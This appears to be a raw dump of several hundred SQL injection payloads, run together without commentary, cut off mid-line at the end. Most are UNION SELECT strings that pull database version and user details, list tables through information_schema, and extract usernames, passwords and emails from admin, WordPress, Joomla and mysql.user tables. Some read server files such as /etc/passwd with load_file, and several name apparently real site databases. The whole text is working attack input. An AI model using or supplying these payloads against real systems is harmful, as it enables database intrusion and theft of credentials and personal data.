group_concat(table_name),2 from information_schema.tables-- -6124 union select 1,concat(nick,0x3a,passwd,0x3a,email),3,4 from users/* 612 and version()=5 -612 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8 -612 union select 1,concat_ws(0x3a,version(),user(),database()),3,4 -- 613' and 1=0 union select 1,2,3,concat_ws(0x3a,id,loginname,password,email),5,6,7,8,9 from phplist_admin limit 0,1 -- -613 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,0,1 from bsmc.bcms_admins limit 0,1/* -6145 union select concat(login,0x3a,password,0x3a,admin) from users limit 1,2 -615 union select 1,2,3,4,group_concat(COLUMN_NAME),6,7 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273-- 616' UNION SELECT 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16 LIMIT 1,1 -- -61738 union select 1,concat_ws(0x3a,name,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tb_admin-- 618' union select 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17-- 61.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6 -- -619 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3/* 61 aNd 1=0 UNION SELECT 1,2,3,version(),5,6 -- 61 and 1=0 Union Select 1,group_concat(login,0x3a,password,0x0b),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from tourlider_expo.delice_managers -- -61 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 6=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -- -61 union select 1,2,3,4,5,6,7,8,9,10 from INFORMATION_SCHEMA.TABLES/* -61 union select 1,2,3,4,5,6 from user/* -61 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 61 union select 1,2,3,4,password,6 from users -- -61 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -61 union select 1,2,3,4,version(),6,7,8,9,10,login,password,13,14,15,16 from user/* -61 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from user-- 61 union select 1,2,concat(username,0x2e,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from users limit 1,1/* -61 union select 1,2,concat_ws(0x3a3a,admin_login,admin_pass),4,5 from admin -- 61 union select 1,2,group_concat(email,0x3a,pass,0x0b) from cat_users-- -61 UNION SELECT 1,2,ID from medicina_users limit 0,1/* -61 union select 1,2,table_name,4 from information_schema.tables/* -61 union select 1,concat(login,0x20,passw),3,4,5,6,7 from user-- -61 union select 1,concat(user_login,0x20,user_pass),3,4,5,6,7,8,9,10 from wp_users-- -61 union select 1,concat_ws(0x3a,login,password,name) from user/* 61 UnIon selECt 1,concat_ws(0x3a,user_name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from users -- -61 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15 -- -61 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 -- -61 union select 1,version(),3,4,5,6,7,8/* -61 union select concat_ws(0x3a,id,username,pword) from admin-- -61 union select database() from users/* 620 and 1=(select first 1 rdb$relation_name from rdb$relation_fields)-- -620 union select 1,2,3,4,5,6,concat(user(),char(58),version(),char(58),database()),8,9,0,11,12,13,14,15,16,17-- -620 union select 1,2,3,4,5,6,concat_ws(0x3a,uid,name,pass),8,9,0,11,12,13,14,concat_ws(0x3a,uid,name,pass),16,17 from users-- -620' union select 1,2,user(),4,5,6,7,version(),9,10,11,12,13,14,15,16,17 -- 620 union select 1,concat(version(),database(),0x3a,user()),3,4,5,6,7,8/* 6211-999.9 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11-- -62240 union Select user(),2,3,4/* -622 UNION SELECT 1,2,3,4,5,6,7,concat_ws(0x0b,user(),version(),database()),9 -622 union select 1,2,3,4,concat(0x3a,user(),0x3a,database(),0x3a,version()),6,7,8,9,10,11,12,13 -623551 union select 1,user,3,4,5,6,7,8,9,10,11,12,13,14 from mysql.user -623 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12 -6254 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -625 union select 1,2,concat_ws(0x3a,admin_user,admin_pass),4,5,6 from admin-- -626 union select 1,2,3,4,concat_ws(0x2f,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/* -6271 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -627' union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8 -- -6293 union select 1,concat_ws(0x3a,user,password,host),3,4,5,6,7,8,9,0,1,2,3,4,5 from mysql.user/* 62 AND 1=2 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),13,14,15,16,17,18,19,20,21,22,23,24,25 from jos_users where id=62-- 62 and substring(version(),1,1)=5 62'AND substring(version(),1,1)="5" -- -62 union select 1,2,3,4,5,6 -- -62 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from cart_payment -- -62 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),version(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -62 union select 1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users-- -62 /*!union*/ /*!select*/ 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10-- -62 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10-- -62 UnIon selECt 1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from adminusers -- -62 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),7,8-- -62 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9-- -62 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6 -62 union select 1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),4,5,6,7,8,9,10,11/* -62 union select 1,2,concat(username,0x3a,password),4,5 from admin_users -62 union select 1,2,concat_ws(0x3A3a,version(),database()),4,5,6,7,8,9,10,11,12,13/* -62 union select 1,2,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),group_concat(0x0b,login,0x3a3a,password) from admin-- 62 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7 limit 1,1/* -62 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8-- -62 union select 1,2,concat_ws(0x3a,version(),user())a,4-- -62 union select 1,2,password,4,5 from user/* -62 union select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables limit 1,99/* -62 union select 1,2,unhex(hex(concat_ws(0x3a,Version(),user()))),4,5,6,7,8,9,10,11/* -62 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12/* -62 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- 62 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users-- -62' UNION SELECT 1,CONCAT_WS(0x3a,user(),version(),database()),3,4,5/* -62 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 -62 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -62 union select 1,concat_ws(':',version(),user(),database()),null -62 union select 1,null,null,null,null,null,version()||chr(58)||current_user||chr(58)||current_database(),null,null,null,null,null,null,null,null,null,null,null,null,null,null-- -62 union select concat_ws(char(58,58),user(),database(),version()),2/* -62 union select table_name,2,3,4,5 from information_schema.tables/* 63009 and 1=0 union select 1,version()-- -6300 union select 1,2,3,4,5,6,7,8,9,table_name,11,12,13 from information_schema.tables-- 6309 and 1=0 union select 0,1,2,3,4,5,6-- -630 /*!union*/ /*!select*/ 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7-- -6315 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53-- -631 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7 -631 union select 1,2,3,concat(version(),char(58),user(),char(58),database()),5,6,7,8,9,10,11,12,13,14 63297 union select 0,1,2,3,table_name,5,6,7,8,9,10,11 from information_schema.tables/* -633' union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5/* 6342 and 1=2 union all select 1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15 from editor-- -63471 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10 -- -6349 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- -634 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14/* -634' union select 1,2,3,user(),5,version(),database(),8,9,10,11/* 635 and (ascii(substring(VERSION(),1,1))=52) -635 union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),3,4,5,6,7,8 636-1 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9-- 63708 union select 1,2,3,version(),user(),database(),7,8,9,10 limit 1,1/* -6373 union select concat_ws(0x0b,user(),database(),version()) -6374 union 1,2,3,4,5-- -6389 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables limit 160,1/* 63900 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from author/* 63-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 63-999.9 union select 1,2,3,version(),5,6,7,8,9,10,11-- 63-999.9 union select 1,version(),3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 63.9' union all select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16 and 'x'='x -639 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9-- 63 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13-- 63' and 1=2 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6/* 63 AND ascii(lower(substring(concat(user(),0x3a,version(),0x3a,database()),1,1)))>1 63'or (1,1)=(select count(0),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 63 or 1=(selecttop1table_namefrominformation_schema.tables)-- -63 union all select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6 -- -63 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,user(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 -- -63 union select 1,2,3,4,5,6,7,8,9 from admin /* 63 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user,password) from mysql.user/* -63 union select 1,2,3,4,5,6,concat_ws(version(),database(),user()),8,9-- 63 union select 1,2,3,4,5,6,version(),8,9-- 63' union select 1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10,11,12,13,14 from information_schema.columns-- -63 uNioN selEct 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,0,1-- -63 union select 1,2,3,4,user(),database(),7,8,9,10,11,12,13,14,version()/* -63' union select 1,2,3,concat_ws(0x3a,version(),user(),database())-- 63 union select 1,2,3,login,password,6,7 from users/* 63 union select 1,2,3,version(),5,6,7,8-- -63 union select 1,2,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13 63 UNION SELECT 1,2,concat_ws(0x2b,user(),version(),database()),4,5 LIMIT 1,1 -63 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12-- -63 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6/* -63 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- 63' union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,0x2F2A2A2F,password),0x71),0x71),3,4 from users limit 1,1/* -63 union select 1,concat_ws(0x2a2a2a,email,password),3 from admin/* -63' union select 1,concat_ws(0x3A3a,username,password),3,4 from users limit 0,1/* -63 union select 1,concat_ws(0x3A3a,version(),database(),user()),3,4/* -63 union select 1,group_concat(username,char(58),password),3,4,5 from ecom_user -- -63 union select 1,null,3,2,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -63 union select concat(version(),0x3a,user(),0x3a,database())-- 63 union select concat_ws(0x3,version(),user(),database()) 63 union select database(),2 /* -63' union select table_name,table_schema from information_schema.tables/* -63 union select unhex(hex(concat_ws(0x3a3a,version(),user(),database()))),2,3/* -64066 union select 1,2,user(),version(),5,6,7/* -64079 union select 1,2,concat_ws(0x2F,user(),database(),version()),load_file('etc/passwd/'),5,6,7/* 640932 union select 1,2,group_concat(table_name separator 0x3a),4,5,6 from information_schema.tables limit 0,1-- 640 union select 1,2,unhex(hex(version())),4,5,6,7,8 from users/* 64157 or 1=(select top 1 column_name from information_schema.columns where table_name='tMKSInetUser' and column_name not in ('UserID','login','passw'))-- 641 aNd 1=0 UNION SELECT 1,version(),3,4,5,6,7 -- -641 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -641 union select 1,2,3,table_name,5 from information_schema.tables limit 17,1-- -6421 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)-- -6422 union select 1,2,3,4,user,password,7,8 from mysql.user/* '642' AND (version() like '%254.0.26%25') and (user() like '%25restconcaravanru%24') and (database() like '%25restconcaravanru%25') -- -642' union select 1,concat_ws(char(58),UserID,Login,Password),3,4,5,6,7,8 from ut_users/* -6431 union select 1,group_concat(table_name),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 from information_schema.tables -- -643 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),12,13,14,15,16,17-- 64517' UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1-- 645-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12-- -645 and 1=2 union all select 1,2,3,concat_ws(0x3a,login,pass,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from users-- -6467 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126 -646 union select 1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14,15 -- -6472 union select 1,2,3,4,5,concat_ws(0x3a,user(),@@version_compile_os,version()),7,8,9,10 -- 647 union select 1,2,3,4,5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17,18 from users limit 1,1 -- -6484 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20/* -6485 union select 1,2,3,4,5,6,7,concat(version(),0x20,database(),0x20,user()),9,10-- -648' union select 1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,39 from users/* 6492 union select 1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9-- -649 union select 1,unhex(hex(concat_ws(0x3a,version(),database(),user()))),3,4-- 64 and 0 union select 1,2,3,4,5,6,7,concat_ws(0x3a ,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21 from nuke_users-- 64 and 1=0 union select 1,2,version() -- 64 and(1)=1# 64 and 1=2 union select conca 64') union select 1,2,3,4,5,6,7,8,9,10,11,12,12,14,15,16,17,18/* -64' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* -64 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user/* -64 UNION SELECT 1,2,3,4,5,6,7,'shell'/* -64 union select 1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9 from mysql.user/* -64' union select 1,2,3,4,5,6,version(),8/* -64 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16/* -64 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8-- 64 union select 1,2,3,concat_ws(0x203B20,user(),database(),version()),5,6,7,8,9,10,11,12,13 -- -64 union select 1,2,3,concat_ws(char(58),user,password),5,6,7 from mysql.user limit 6,1-- -64 union select 1,2,database(),user(),5,6/* -64 UNION SELECT 1,CONCAT(id,0x3a,login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM u12625_postsov.postsov_admins LIMIT 0,1-- -64 union select 1,concat_ws(user(),version() ,database()),3,4 -- -64 union select 1,database(),3,4,5/* 64' union select 1,group_concat(user_id,0x3a,user_password),3 from users/* 64 union select 1,username,3,password,5,6,7,8,9,10,11,12 from login/* -64 union select 1,version(),3,database(),user(),6,7/* -64 union select group_concat(username,0x3a,password),2 from admin/* -650 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,0,11,12,13,14,15,16/* 650 union select concat_ws(0x0a,id,email,password),2,3 from members limit 2,1/* -650 union select concat_ws(0x20,version(),database(),user()),2,3 -650 union select null,name||chr(58)||password||chr(58)||email,null,null,null,null,null,null from seller-- -651 union select 1,2,3,concat_ws(0x3a,name,version()),5,6,7,8,9 from authors/* -651' union select 1,concat(login,0x3a,pass),3,4,5,6,7,8 from users/* 6520 aNd 1=0 UNION SELECT 1,2,3,version() -- 652 union select 1,2,concat_ws(0x3a3a,COLUMN_NAME),4,5,6,7,8 from information_schema.columns/* -652 union select 1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,0,1 from mysql.user/* -653 union select 1,2,3,4,group_concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11-- 654-999.9 union select 1,2,version(),4,5,6,7,8,9,10,11 -- 654 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14-- -65539 UNION SELECT 0,1,2,3,4,5,6,7,8,9,concat_ws(0x0b,user(),version(),database()),11,12,13,14,15,16,17,18 6553 and 1=2 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 6565587687637987 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51-- 656565' UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4/* 6570 and 128>=ascii(mid(version(),1,1))/* 65-787 union select 1,2,3,4,group_concat(password,0x3b,userID),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from ISM_Users -658026 union select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55)/* 6586 OR(1=(SELECTTABLE_NAMEFROMINFORMATION_SCHEMA.TABLESforxmlraw)) -658 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12-- 658 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13 from orientationlyon_users/* -659 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15,16,17,18,19,20,21,22,23-- 65 and 1=2 UnIon selECt 1,2,concat_ws(0x3a,u_name,u_password,u_privilege),4,5,6,7,8,9,10,11,12 from fs_users-- 65 limit 0 union select 1,2,3,version(),5,1,2,3/* -65 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),22,23,24,25,26,27,28,29 from information_schema.tables where table_schema=CHAR(115,101,105,108,111,114,105,102,105)-- -65 union select 1,2,3,4,5,6,7,8,9,10 from cns_config -- -65 union select 1,2,3,4,5,concat_ws(0x3a3a,admin_user_type,admin_user_workflow,admin_username,admin_password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from Admin_Users /* -65' union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13-- 65 union select 1,2,3,table_name,5,column_name,7,8,9,1 from information_schema.columns limit 193,1 -65 union select 1,2,3,username,password,6,7,8,9,10 from users limit 1,1 /* -65 union select 1,2,concat(username,0x3a,email,0x3a,pass,0x3a,id),4,5,6 from users/* -65 union select 1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3 from users/* -65 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(username,0x7873716C696E6A64656C,user_password,0x7873716C696E6A64656C,user_level) FROM yarich.users LIMIT 0,1),0x7873716C696E6A656E64),3,4,5,6/* -65 union select 1,concat(Name,0x3a,Password),3,4,5,6,7 from pacesett_regdb.users-- -65 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),null,5,null,null,null,9,10,11,12,null,14 from information_schema.tables-- 65 union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12 -- 65 union select 1,concat_ws(0x2,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -65 union select 1,concat_ws(0x3a,email,pwd),3,4 from partners-- 65 union select 1,concat_ws(0x3a,user(),database(),version()) -- -65 union select concat(username,0x20,password),2,3,4,5 from users limit 4,1-- -65 union select concat(username,0x3a,password),2 from cms_admin limit 0,1-- -65 union select LOAD_FILE(0x2F7777772F6576656E74732F696E636C756465732F636F6E6669672E706870),2,version() from mysql.user/* -65 union select user() from admin -- -6606 union select convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1)/* -660 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7 -- -660' union select 1,version(),3,4,5,6` -661 union select 0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9/* 662 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 LIMIT 1,1-- -663 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- -663 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11-- -663 union select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from wp_users -663 union select 1,concat_ws(0x2b,version(),user(),@@version_compile_os),3,4 -- -664 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 -- -664 union select 1,user(),3,4,5 -- -664 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -66514 union select 1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,concat_ws(char(58,58),FIRST_NAME,password),14,15,16,17,18,19,20 from users limit 2,2/* 66565437987 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6-- 666-666.666 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9,10,11,12,13-- -666 union all select 1,2,concat(name,0x3a,0x3a,pass),4,5,6,7,8,9,10,11,12,13 from users limit 0,1/* -666 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,version(),user(),database())/* 666 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- -666 union select 1,2,CONCAT(user(),CHAR(32,58,32),version(),CHAR(32,58,32),database()),4,5,6,7,8,9,0,1,2-- 666 union select 1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/* -666 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 666 union select concat_ws(0x3a,user,password,file_priv),2,3,4,5 from mysql.user-- -666 union select concat_ws(user(),version(),database()) config_variables-- -66787 union select concat_ws(0x3a,username,password),2,3,4 from adminuser-- 667' union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -667 UNION SELECT 1,2,3,4,concat(user,0x3a,password),6,7,8,9,10,11,12,13 from mysql.user/* 6687655434 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),14,15-- 66988 and 1=2 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15-- 66988 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15-- -669' UNION SELECT 0,1,concat_Ws(0x0b,user(),version(),database()),3,4,5,6,7,8,9 -- -669 union select 1,2,3,4,5,6,load_file('/etc/passwd'),8 from mysql.user 66 and 1=0 union select 1,2,3,4,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),6,7,8 -- 66 and 1=0 union select 1,version(),database(),user(),5,6-- 66 and 1=0 UNION SELECT version() -- 66 and (1,1)=(select * from (select name_const(version(),1),name_const(version(),1))x)-- -66' and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8 -- -66 and 1=2 union select 1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45-- 66 and ascii(substring((select login from users limit 1),1,1))>1 -66' union select 11,concat(user(),0x3a,database(),0x3a,version()),3,4,5/* 66 union select 1,2,3,4,5,6,2,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 66 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from msysaccessobjects -66 union select 1,2,3,4,5,6,7,8,9,10,11,convert(concat_ws(0x3A3a,user,password) using latin1),13,14,15,16,17,18,19,20,21,22,23 from mysql.user/* -66 union select 1,2,3,4,5,6,count(*),8 from admin -66 union select 1,2,3,4,group_concat(0x0b,table_name) from information_schema.tables-- -66 union select 1,2,3,concat_ws(0x3A3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -66 union select 1,2,3,concat_ws(0x3a,id,name,password),5,6,7 from users/* -66 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10 from 